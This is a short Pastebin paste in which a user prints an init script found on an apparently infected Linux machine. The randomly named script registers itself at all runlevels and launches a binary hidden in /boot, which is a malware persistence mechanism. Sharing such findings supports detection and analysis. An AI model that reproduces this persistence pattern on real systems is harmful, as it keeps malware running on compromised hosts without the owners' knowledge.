GioMac

linux malware lsb init script

Nov 15th, 2014
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. [root@giomacdesk init.d]# cat mmuaujalke
  2. #!/bin/sh
  3. # chkconfig: 12345 90 90
  4. # description: mmuaujalke
  5. ### BEGIN INIT INFO
  6. # Provides: mmuaujalke
  7. # Required-Start:
  8. # Required-Stop:
  9. # Default-Start: 1 2 3 4 5
  10. # Default-Stop:
  11. # Short-Description: mmuaujalke
  12. ### END INIT INFO
  13. case $1 in
  14. start)
  15. /boot/mmuaujalke
  16. ;;
  17. stop)
  18. ;;
  19. *)
  20. /boot/mmuaujalke
  21. ;;
  22. esac
Advertisement
Add Comment
Please, Sign In to add comment